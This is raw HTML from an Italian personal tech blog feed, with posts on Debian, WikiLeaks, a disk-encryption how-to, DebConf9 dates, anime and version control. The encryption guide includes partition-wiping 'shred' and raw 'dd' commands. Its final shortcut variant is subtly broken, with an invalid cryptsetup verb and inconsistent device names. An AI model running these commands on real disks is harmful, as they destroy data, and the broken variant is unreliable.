src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmgF0FACSQI/AAAAAAAAAN4/xzQJdAc8zFs/s200/alicedebian.jpg" alt="" id="BLOGGER_PHOTO_ID_5361541748638238978" border="0" /></a><br />per farsi una Debian card è semplicissimo<br />basta avere Gimp scaricarsi <a href="http://archive.daniel-baumann.ch/debian/events/business-cards/flashy/upstream/carte_debian_expo.xcf">questo file<br /></a>e cambiare i layer con gimp<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-6954326724697261704?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-85965288547457494432009-07-22T22:50:00.000-07:002009-07-22T22:58:51.676-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Zb07uqFW8vM/Smf7KuAIuCI/AAAAAAAAANw/F4AMmbBtwKY/s1600-h/http:_wikileaks.org_wiki_Category:Italy.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 58px; height: 200px;" src="http://4.bp.blogspot.com/_Zb07uqFW8vM/Smf7KuAIuCI/AAAAAAAAANw/F4AMmbBtwKY/s200/http:_wikileaks.org_wiki_Category:Italy.jpg" alt="" id="BLOGGER_PHOTO_ID_5361530042973730850" border="0" /></a><br /><a href="http://wikileaks.org/wiki/Category:Italy">http://wikileaks.org</a><br /><br />si proclama una organizzazione multi giurisdizionale con l intento di proteggere dissidenti interni, giornalisti e bloggers e chiunque abbia problemi con la legge riguardanti alle sue pubblicazioni.<br /><br />Il suo interesse primario è mostrare i regimi oppressivi in asia, in russia, sud africa e nel medio oriente ma formiamo anche assistenza a tutte le nazioni che vogliono mostrare i comportamenti non eitici del loro governo.<br />miriamo al massimo impatto politico !<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-8596528854745749443?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-16750948238119525052009-07-22T22:25:00.000-07:002009-07-22T22:33:08.901-07:00<img style="width: 939px; height: 245px;" alt="http://www.symantec.com/content/en/us/home_homeoffice/images/prodbox/background/n-product-navGE.gif" src="http://www.symantec.com/content/en/us/home_homeoffice/images/prodbox/background/n-product-navGE.gif" /><br /><br />ecco cosa mancava a norton un bel antivirus più leggero.<br />dicono che questo nuovo antivirus non solo protegge meglio ma utilizza anche meno risorse del computer permettendo cosi migliori prestazioni coi videogiochi ?????<br /><br />ti fanno pagare per aver tolto tutte le aggiunte inutili ??<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1675094823811952505?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-30826995572107268122009-07-22T22:00:00.000-07:002009-07-22T22:06:05.238-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Zb07uqFW8vM/Smfun5JZjRI/AAAAAAAAANo/ZcHdJ3m0O7Y/s1600-h/591739524_7M7xc-M.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 134px;" src="http://2.bp.blogspot.com/_Zb07uqFW8vM/Smfun5JZjRI/AAAAAAAAANo/ZcHdJ3m0O7Y/s200/591739524_7M7xc-M.jpg" alt="" id="BLOGGER_PHOTO_ID_5361516250530417938" border="0" /></a>Questo l'argomento di <a href="http://opendotdotdot.blogspot.com/">Glyn Moody</a> al Desktop summit in Gran Canaria<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3082699557210726812?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-48531747681198428532009-07-22T10:33:00.000-07:002009-07-23T07:23:33.618-07:00<a href="http://imgs.xkcd.com/comics/responsible_behavior.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 398px; height: 123px;" src="http://imgs.xkcd.com/comics/responsible_behavior.png" alt="" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />offro tanta vodka !! :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4853174768119842853?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-29983275782061678582009-07-21T17:59:00.000-07:002009-07-21T18:09:40.848-07:00Stasera volevo vedere un pezzo del mio anime preferito tra i preferiti<br />quello che mi ha ispirata in quello che faccio e che mi ha dato tante informazioni e tanti spunti di approfondimento.<br />Cosi ho dovuto installare il pacchetto <a href="http://ftp.debian-unofficial.org/debian/pool/main/libd/libdvdcss/">libdvdcss2</a><br />che senza di quello Debian non vo leggerà mai i vostri DVD acquistati<br />per installarlo basta dare da root il comando<br />#dpkg -i <span style="font-style: italic;">nomedelfile</span><em>.deb</em><br /><br />il problema del pacchetto libdvdcss2 per essere considerato nonufficiale è che da alcuni paesi non è approvato<br /><br />cmq non è il caso dell'italia<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-2998327578206167858?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-5501169992450227152009-07-21T14:21:00.000-07:002009-07-21T17:51:38.440-07:00Dovete andare in qualche paese con leggi molto rigide riguardo al materiale contenuto nei vostri pc ?<br />anche se magari è solo una vostra foto nuda a qualche festa di compleanno ? (che feste di compleanno frequentate ?!?)<br /><br />comunque troppa politica finisce per colpire esclusivamente cittadini che troppo spesso non centrano nulla!!!<br /><a href="http://img213.imageshack.us/img213/9389/vlcsnap16689521.png">_</a><br /><br />cosi ho deciso di inserire una guida su come criptare partizioni su Debian...<br />allora ho un laptop con <span style="font-style: italic; font-weight: bold;">/boot</span><span style="font-weight: bold;"> </span>in una partizione separata, seguita da <span style="font-style: italic; font-weight: bold;">/root</span> e<span style="font-style: italic;"> <span style="font-weight: bold;">/swap</span>.</span> Bisongna per forza avere<span style="font-style: italic; font-weight: bold;"> /boot</span> separato dal resto, perchè il BIOS deve caricare un kernel non criptato prima di accedere alla partizione criptata. Un'altra opzione è di tenere<span style="font-weight: bold; font-style: italic;"> /boot</span> su una chiavetta USB, ma per affrontare questo metodo servirebbe un intero altro post. <p>Prima di tutto, installate il software per gestire le partizioni criptate e aggiornate l'immagine initrd:</p><p><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" >#</span><span style="font-weight: bold;font-size:100%;" >aptitude install cryptsetup initramfs-tools</span><br /></p><span style="color: rgb(102, 102, 0);"><span style="font-size:130%;"><br /></span></span>Ora dobbiamo essere sicuri che siano presenti su initrd i moduli per criptare, quindi aggiungo i tre moduli initrd config:<span style="font-size:180%;"><br /></span><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >echo aes-i586 >>/etc/initramfs-tools/modules</span><span style="font-weight: bold;font-size:100%;" ><br /></span><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >echo dm-crypt >>/etc/initramfs-tools/modules</span><span style="font-weight: bold;font-size:100%;" ><br /></span><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >echo dm-mod >>/etc/initramfs-tools/modules</span><br /><br /><br />Questo passaggio probabilmente non è necessario perchè initramfs-update gia sa di che moduli ha bisogno analizzando <span style="font-weight: bold; font-style: italic;">/etc/crypttab</span> e <span style="font-style: italic; font-weight: bold;">/etc/fstab</span> e controllando i moduli caricati.<br /><br />Il prossimo passaggio è informare cryptsetup e inittab del mappaggio della partizione tra <span style="font-style: italic; font-weight: bold;">/dev/hda2</span> (il disco fisico) e <span style="font-weight: bold; font-style: italic;">/dev/mapper/root</span> (l'interfaccia di criptazione).<br /><span style="font-weight: bold;font-size:100%;" ><span style="color: rgb(153, 51, 153);">#</span><span class="input">echo "root /dev/hda2 none luks" >>/etc/crypttab</span><br /><span style="color: rgb(153, 51, 153);">#</span><span class="input">sed -i 's#/dev/hda2#/dev/mapper/root#' /etc/fstab</span></span><br /><br />Dobbiamo anche cambiare il sistema di root per grub nello stesso modo in cui lo abbiamo fatto con inittab:<span style="font-size:180%;"><br /></span><span style="font-weight: bold;font-size:100%;" ><span style="color: rgb(153, 51, 153);">#</span><span class="input">sed -i 's#/dev/hda2#/dev/mapper/root#' /boot/grub/menu.lst</span></span><br /><br />Ora dobbiamo ricreare l immagine initrd inserendo:<br /><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span class="input" style="font-size:130%;"><span style="font-weight: bold;font-size:100%;" >update-initramfs -k all -u</span><br /></span><p>Ora siamo pronti per spegnere tutto e bootare da un Live CD per fare un backup , creare una partizione criptata e ricopiare tutto nel filesystem contenuto in una partizione gia criptata. Lascio al lettore la possibilità di scegliere tra le diverse opzioni di backup:Un semplice "<span style="font-size:130%;"><tt style="font-style: italic; font-weight: bold;">cp -ax /mnt/root/* /mnt/backup</tt></span>" può essere cmq abbastanza come backup.</p><p>Una volta che il backup è stato eseguito, cancellate tutti i dati nella partizione con:</p><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >shred -n1 -v /dev/hda2</span><br /><p>Dopo di che create una partizione criptata con:</p><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >cryptsetup luksFormat /dev/hda2</span><span style="font-weight: bold;font-size:100%;" ><br /></span><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >cryptsetup luksOpen /dev/hda2 root</span><span style="font-size:130%;"><br /></span> <p>Dopo che la partizione è stata creata, pronta e aperta, create un filesystem, montatelo con mount e copiate il backup di root nella partizione appena creata:</p><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >mkfs.ext3 /dev/mapper/root</span><span style="font-weight: bold;font-size:100%;" ><br /></span><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >mount /dev/mapper/root /mnt/root</span><span style="font-weight: bold;font-size:100%;" ><br /></span><span style="color: rgb(153, 51, 153); font-weight: bold;font-size:100%;" class="prompt" >#</span><span style="font-weight: bold;font-size:100%;" class="input" >cp -ax /mnt/backup/* /mnt/root/</span><br /><br />Ora siete pronti per caricare la partizione criptata:<br /><br />Una volta che siete sicuri che funziona, aggiungete la partizione di swap criptata. vi basterà inserirla in <span style="font-weight: bold; font-style: italic;">/etc/crypttab</span> e modificare <span style="font-weight: bold; font-style: italic;">/etc/fstab </span>con questi comandi:<br /><span style="font-size:100%;"><br /></span><span style="font-weight: bold;font-size:100%;" ><span style="color: rgb(153, 51, 153);">#</span>echo "swap /dev/hda3 /dev/random swap" >>/etc/crypttab<br /><span style="color: rgb(153, 51, 153);">#</span>sed -i 's#/dev/hda3#/dev/mapper/swap#' /etc/fstab<br /><br /></span>Ora avremo il nostro bel computer criptato e potremmo passare indenni dai potenziali controlli sul nostro computer.<br /><br />c'è anche un sistema per evitare di fare backup e formattare:<br /><br />per esempio se hai il disco /dev/hda1<br /><br />cryptsetup crea mio-disco /dev/hda1<br /><br /># disco criptato:<br />dd if=/dev/hda1 of=/dev/mapper/mio-disco<br /><br />#disco non criptato:<br />dd if=/dev/mapper/my-disk of=/dev/hda1<br /><br /><span style="color: rgb(204, 102, 204);">no copyrights </span><br /><span style="color: rgb(204, 102, 204);">no fees </span><br /><span style="color: rgb(204, 102, 204);">only freedom</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-550116999245022715?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com2tag:blogger.com,1999:blog-2454834713612225354.post-11257280612000268042009-07-21T13:41:00.000-07:002009-07-22T10:29:42.821-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmdMgdvG-kI/AAAAAAAAANg/y4x2J7DgW5k/s1600-h/2559983798_07996b5534_m.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 163px;" src="http://1.bp.blogspot.com/_Zb07uqFW8vM/SmdMgdvG-kI/AAAAAAAAANg/y4x2J7DgW5k/s200/2559983798_07996b5534_m.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5361338002029607490" /></a><br /><br /><br />5 cucchiai di proteine isolate della soia (quelle usate come emulsionante)<br />2 cucchiai di lievito<br />3/4 di bicchiere di Pina Colada Mix (prendi quello più scaccio con dentro il cocco artificiale)<br />1/4 di cucchiaio di Gomma di Guar<br /><br />Mescola per 10 minuti e riempi la forma per la torta. Questo è tutto!<br /><br />note riguardo la Pina Colada Mix:<br />Il mix che ho usato è il più scaccio che ho trovato si chiama "on The House" in una chiara bottiglia di pastica con una etichetta gialla.<br /><br />N.B. questa è una ricetta open source puoi trovare l'algoritmo per farla qua<br /><a href="http://aliceinwire.pastebin.com/f6f4ceabb">http://aliceinwire.pastebin.com/f6f4ceabb</a><br />sei libero di farci quello che vuoi e inserirci i tuoi aggiornamenti !!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-1125728061200026804?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-59898232545453010482009-07-21T12:18:00.000-07:002009-07-21T12:34:56.251-07:00<a href="http://debconf9.debconf.org/"><img style="width: 297px; height: 68px;" alt="Image:01 es Horizontal2Colors alfa.svg" src="http://wiki.debconf.org/upload/thumb/f/fe/01_es_Horizontal2Colors_alfa.svg/800px-01_es_Horizontal2Colors_alfa.svg.png" border="0" /></a><br />Tra poco parte la 9 conferenza sul sistema operativo Debian a <a href="http://maps.google.com/maps/ms?ie=UTF8&amp;t=h&amp;msa=0&amp;msid=108464253750342031323.000465cdba765027d352d&amp;ll=39.471848,-6.359711&amp;spn=0.082687,0.096989&amp;z=13">Cacèrès </a><a href="http://maps.google.com/maps/ms?ie=UTF8&amp;t=h&amp;msa=0&amp;msid=108464253750342031323.000465cdba765027d352d&amp;ll=39.471848,-6.359711&amp;spn=0.082687,0.096989&amp;z=13">(spagna)</a>.<br /><br />Purtroppo per coincidenze con l'università non potrò presenziare<br />spero di riuscire a partecipare l'anno prossimo a NEW YORK.<br /><br /><br /><br /><table><caption>DebConf9 Dates</caption> <thead> <tr> <th>Date</th> <th>Description</th> </tr> </thead> <tbody> <!-- old <tr> <th class="sub" colspan="2">April, 2009</th> </tr> <tr> <td>Wednesday, 15th</td> <td> <strong>Early registration and paper submission deadline.</strong><br /> To be eligible for free food and acommodation and/or travel sponsorship, you need to <a href="https://penta.debconf.org/">register</a> before this date. The same date is the last chance to <a href="https://penta.debconf.org/penta/submission/dc9">submit</a> your talk proposal; after this, all talks will have to be out of the official program and proceedings. </td> </tr> <tr> <th class="sub" colspan="2">May, 2009</th> </tr> not really useful to show people (we don't list other 'opening' dates), but leaving for team reference: <tr> <td>Monday, 22th</td> <td>Start of reconfirmation period</td> </tr> <tr> <th class="sub" colspan="2">June, 2009</th> </tr> <tr> <td>Sunday, 7th</td> <td>Deadline for reconfirmation of attendance</td> </tr> --> <tr> <th class="sub" colspan="2">July, 2009</th> </tr> <tr> <td>Giovedi, 16th</td> <td> Primo giorno di DebCamp<br />Primo giorno per cibo e stanza da sponsor(solo per le persone che danno una mano al DebCamp). </td> </tr> <tr> <td class="hlt">Giovedi, 23th</td> <td class="hlt"> Ultimo giorno al DebCamp (e giorno d'arrivo per il DebConf)<br /> Primo giorno di cibo e stanza dagli sponsor per persone che aspettano il DebConf. </td> </tr> <tr> <td>Venerdi 24th</td> <td>DebConf Giorno 1 e anche giornata open Debian</td> </tr> <tr> <td class="hlt">Sabato, 25th</td> <td class="hlt">DebConf Giorno 2</td> </tr> <tr> <td>Domenica,26th</td> <td class="hlt">DebConf Giorno 3</td> </tr> <tr> <td class="hlt">Lunedi, 27th</td> <td>DebConf Giorno 4: Giornata con gita<br /></td> </tr> <tr> <td>Martedi, 28th</td> <td>DebConf Giorno 5: cena di conferenza<br /></td> </tr> <tr> <td class="hlt">Mercoledi,29th</td> <td class="hlt">DebConf Giorno 6</td> </tr> <tr> <td>Giovedi, 30th</td> <td> DebConf Giorno 7 <strong>(Ultimo giorno)</strong><br /> Ultimo giorno per la stanza e il cibo offerto dagli sponsor. Devi partire il 31 in mattinata! </td> </tr> <tr> <td class="hlt">venerdi, 31th</td> <td class="hlt">Pulizie e partenza<br /></td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-5989823254545301048?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-40441844502265712882009-07-21T11:42:00.000-07:002009-07-21T11:58:44.382-07:00mi è capitato di dare un occhiata a questo sito<br />raccoglie molti video sulla sicurezza in internet<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://securitytube.net/"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 132px; height: 200px;" src="http://3.bp.blogspot.com/_Zb07uqFW8vM/SmYOIxkzd8I/AAAAAAAAANY/fUwmSc_UwYc/s200/SecurityTube+-+Watch,+Learn+and+Contribute+Computer+Security+Videos.jpg" alt="" id="BLOGGER_PHOTO_ID_5360987950340601794" border="0" /></a><br /><br />purtroppo sono in inglese <br />quindi dovete avere almeno una infarinatura sui termini informatici<br /><br /><a href="http://securitytube.net/">http://securitytube.net/<br /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4044184450226571288?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-73140470346991172042009-07-21T11:19:00.000-07:002009-07-21T14:34:50.759-07:00<object height="344" width="425"><param name="movie" value="http://www.youtube.com/v/FVbf9tOGwno&amp;hl=en&amp;fs=1&amp;color1=0x402061&amp;color2=0x9461ca"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/FVbf9tOGwno&amp;hl=en&amp;fs=1&amp;color1=0x402061&amp;color2=0x9461ca" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="344" width="425"></embed></object><br /><br />un ragazzo cerca di installare vista sull suo portatile nuovo fiammante ma gli da continui "blue screen of the death" e incompatibilità con la maggior parte dell'hardware<br />cosi decide di installarlo in un'altra macchina<br /><br />e devo dire che ci riesce benissimo!<br /><br />Go on Debian !!!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-7314047034699117204?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-34984651728584720472009-07-21T07:19:00.000-07:002009-07-21T07:55:02.013-07:00in questi giorni per almeno un paio di settimane ci sarà una votazione su questo sito...<br />la domanda sorge spontanea dall'utenza di linux anche se per quelli che utilizzano window$ o appl3 potrebbe essere non cosi comprensibile visto che essi sono strutturati in modo da utilizzare un solo e unico ambiente desktop conformizzando le masse e le menti a un unico metodo di utilizzo di programmi<br />in fatti le gui spesso sono fatte in modo da rendere l utilizzazione più semplice di quel programma da parte dell utente medio in modo da essere capibile da più persone velocemente.<br /><img style="width: 292px; height: 184px;" alt="http://laptoping.com/wp-content/leopard.jpg" src="http://laptoping.com/wp-content/leopard.jpg" /><br />ma questo da uno standard ormai dettato da niente di meno che microsoft$ di avere tutte i programmi fatti in modo da assomigliare a qualsiasi altro programma su window$.<br /><br />cosi offic3 12 è ottimizzato in modo da utilizzare l interfaccia grafica che usa window$ 7 e cosi tutti i programmi sono fatti in modo da essere simili al sistema base...<br /><img style="width: 420px; height: 315px;" alt="http://news.cnet.com/i/bto/20090108/Windows7.jpg" src="http://news.cnet.com/i/bto/20090108/Windows7.jpg" /><br /><img style="cursor: -moz-zoom-in; width: 420px; height: 314px;" alt="http://www.microsoft.com/presspass/images/features/2005/09-13Office12-Excel_lg.jpg" src="http://www.microsoft.com/presspass/images/features/2005/09-13Office12-Excel_lg.jpg" /><br /><br />per linux non è proprio cosi<br />di ambienti grafici ce ne sono diversi sviluppati da persone che vogliono condividere le proprie conoscenze e che non si vogliono fossilizzare su patetici standard<br />la cosa che sta portando avanti di molto lo sviluppo di questi ambienti è il fatto che attualmente vengono usati sistemi di programmazione collaborativa migliore sotto molti punti di vista e cosa che gli ambienti desktop privati non possono fare su larga scala.<br />Per ora non voglio dare altre informazioni per evitare di influenzare il sondaggio :)<br />cosi vi lascio a voi la scelta dell ambiente che usate più di frequente<br />potete dare più di un voto e anche cambiare idea se vi accorgete di aver sbagliato a votare (spero non accada !!!)<br /><br />GNOME<br /><br /><br /><br /><a href="http://upload.wikimedia.org/wikipedia/commons/2/27/Gnome-2.26.png"><img style="width: 355px; height: 223px;" alt="File:Gnome-2.26.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/2/27/Gnome-2.26.png/800px-Gnome-2.26.png" /></a><br /><br />KDE<br /><br /><a href="http://upload.wikimedia.org/wikipedia/commons/5/54/KDE_4.png"><img style="width: 355px; height: 226px;" alt="File:KDE 4.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/5/54/KDE_4.png/800px-KDE_4.png" /></a><br /><br />Xfce<br /><a href="http://upload.wikimedia.org/wikipedia/commons/7/71/Xfce-4.4.png"><img style="width: 356px; height: 285px;" alt="File:Xfce-4.4.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/7/71/Xfce-4.4.png/750px-Xfce-4.4.png" /></a><br /><br />EDE<br /><a href="http://upload.wikimedia.org/wikipedia/commons/8/8f/102shot_xft1.png"><img style="width: 360px; height: 272px;" alt="File:102shot xft1.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/8/8f/102shot_xft1.png/800px-102shot_xft1.png" /></a><br /><br />Lxde<br /><a href="http://upload.wikimedia.org/wikipedia/commons/4/4c/LXDE_desktop_full.png"><img style="width: 361px; height: 274px;" alt="File:LXDE desktop full.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/4/4c/LXDE_desktop_full.png/800px-LXDE_desktop_full.png" /></a><br /><br />Étoilé<br /><a href="http://upload.wikimedia.org/wikipedia/commons/b/b0/Etoiledock.png"><img style="width: 360px; height: 272px;" alt="File:Etoiledock.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/b/b0/Etoiledock.png/800px-Etoiledock.png" /></a><br /><br />Irix<br /><a href="http://upload.wikimedia.org/wikipedia/en/0/03/4Dwm.png"><img style="width: 362px; height: 290px;" alt="File:4Dwm.png" src="http://upload.wikimedia.org/wikipedia/en/thumb/0/03/4Dwm.png/751px-4Dwm.png" /></a><br /><br />Mezzo<br /><a href="http://upload.wikimedia.org/wikipedia/commons/4/46/Symphonyosb1pr1.png"><img style="width: 361px; height: 272px;" alt="File:Symphonyosb1pr1.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/4/46/Symphonyosb1pr1.png/800px-Symphonyosb1pr1.png" /></a><br /><br />ROX<br /><a href="http://upload.wikimedia.org/wikipedia/commons/2/27/Rox-desktop-2004.png"><img style="width: 358px; height: 287px;" alt="File:Rox-desktop-2004.png" src="http://upload.wikimedia.org/wikipedia/commons/thumb/2/27/Rox-desktop-2004.png/749px-Rox-desktop-2004.png" /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-3498465172858472047?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com1tag:blogger.com,1999:blog-2454834713612225354.post-48612467254248627852009-07-20T15:38:00.000-07:002009-07-20T15:48:28.050-07:00L'ho visto un pò di tempo fa e devo dire che mi è piaciuto molto :)<br />i personaggi sono fatti davvero molto bene e molto caratterizzati.<br />il mio personaggio preferito rimane indubbiamente taiga ribelle e brutale ma al tempo stesso molto dolce.<br />con ryuji che gli sta sempre appresso come fosse suo fratello...<br />fin troppo protettivo.<br />insomma una storia romantica tipica giapponese hihi<br /><br /><img style="cursor: -moz-zoom-in; width: 255px; height: 383px;" alt="http://natalie.mu/media/comic/0904/extra/news_large_toradora03.jpg" src="http://natalie.mu/media/comic/0904/extra/news_large_toradora03.jpg" /><br /><br />piccola nota tora significa tigre e dora dragone<br />e anche ryuji e taiga sono sinonimi<br /><br />tora=taiga=tigre<br />dora=ryuji=dragone<br />:)<br /><br /><img style="cursor: -moz-zoom-in; width: 284px; height: 351px;" alt="http://blog-imgs-26.fc2.com/n/e/k/nekokan836/20081103132038.jpg" src="http://blog-imgs-26.fc2.com/n/e/k/nekokan836/20081103132038.jpg" /><br /><br />mi è capitato per caso di vedere il post sugli onigiri di madeinkitchen cosi mi è venuta la mania degli onigiri gia che prima non avevo abbastanza manie.<br />mi toccherà farmeli...<img style="width: 257px; height: 173px;" alt="http://thumbnail.image.rakuten.co.jp/%400_mall/ikemoto/cabinet/00387956/img50329540.jpg" src="http://thumbnail.image.rakuten.co.jp/%400_mall/ikemoto/cabinet/00387956/img50329540.jpg" /><br /><br /><br /><img alt="http://www.antoku.co.jp/blog/%E3%81%A8%E3%82%89%E3%83%89%E3%83%A9%EF%BC%B0.jpg" src="http://www.antoku.co.jp/blog/%E3%81%A8%E3%82%89%E3%83%89%E3%83%A9%EF%BC%B0.jpg" /><br /><br /><img style="cursor: -moz-zoom-in; width: 280px; height: 209px;" alt="http://chatan0219warehouse4.up.seesaa.net/image/Toradora20wallpaper20220Nov26.jpg" src="http://chatan0219warehouse4.up.seesaa.net/image/Toradora20wallpaper20220Nov26.jpg" /><br /><br />vi lascio con questo ultimo post<br /><br />a domani ;)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2454834713612225354-4861246725424862785?l=drunkgeisha.blogspot.com' alt='' /></div>aliceinwirehttp://www.blogger.com/profile/11563492458763239689noreply@blogger.com0tag:blogger.com,1999:blog-2454834713612225354.post-85483590027495976212009-07-19T05:02:00.000-07:002009-07-20T15:08:43.170-07:00in questo periodo mi è capitato di usare GIT - SVN - BZR<br />sono tutti software per controllare diverse versioni di un progetto (CVS - Concurrent Versions System)<br /><br />GIT <a href="http://upload.wikimedia.org/wikipedia/commons/e/e0/Git-logo.svg"><img alt="File:Git-logo.svg" src="http://upload.wikimedia.org/wikipedia/commons/thumb/e/e0/Git-logo.svg/71px-Git-logo.svg.png" height="26" width="71" /></a><br />è sviluppato da Linus Torvalds il quale ha dichiarato "sono un egoista bastardo e chiamo tutti i miei progetti prima di me, all'inizio linux ora GIT" (git significa idiota in inglese N. buluca)<br />un altra versione del nome è che stia per tracciatore di informazioni globali<br />(credo sia la migliore tra tutte le altre versioni della derivazione del nome)<br /><br />Bazaar <img style="width: 53px; height: 55px;" alt="http://bazaar-vcs.org/htdocs/bazaarNew/css/logo.png" src="http://bazaar-vcs.org/htdocs/bazaarNew/css/logo.png" /> era all inizio chiamato cosi un ramo del client GNU arch tla, questo ramo attualmente è chiamato Baz per distinguerlo da baazar. è creato dalla canonical ltd la compagnia che ha ubunto per intenderci.<br /><br /><br />Mercurial <img alt="http://www.selenic.com/hg-logo/logo-droplets-50.png" src="http://www.selenic.com/hg-logo/logo-droplets-50.png" /> è ideato da Matt Mackall sotto licenza GPL2 è usato da firefox e tutti gli altri componenti del pacchetto mozzilla per le loro repository<br /><br />tutti questi diversi sistemi di revisione collaborativa utilizzano codifiche differenti per uno stesso scopo.<br />tutti cercano di essere il più possibile veloci potenti, facili da usare e decentralizzati<br /><br />utilizzare un sistema collaborativo piuttosto che un sistema centralizzato è molto vantaggioso.<br />ognuno si scarica il proprio pezzetto di pacchetto da modificare e apporta i propri cambiamenti anche offline<br />con l'arrivo di questi controllori di revisioni è arrivata anche una nuova terminologia entrata ormai nell' utilizzo comune dei programmatori<br /><br />Baseline<br />Una revisione approvata di un file o di un documento alla quale possono essere apportate nuove modifiche<br /><br />Branch<br />sono dei file che possono essere branched o forched in un punto nel tempo cosi si dividono in due branche che possono essere gestite e/o sviluppate in modi e tempi differenti indipendentemente dall resto<br /><br />Change<br />Un cambiamento (diff or delta) rappresenta una modificazione specifica di un documento sotto il controllo di versione. la granualità delle modifiche considerate varia nei differenti sistemi RC(controllo di revisione).<br /><br />Change list<br />fa vedere i differenti cambiamenti effettuati in una singola commissione (commit) mostrando anche il codice che è stato modificato.<br /><br 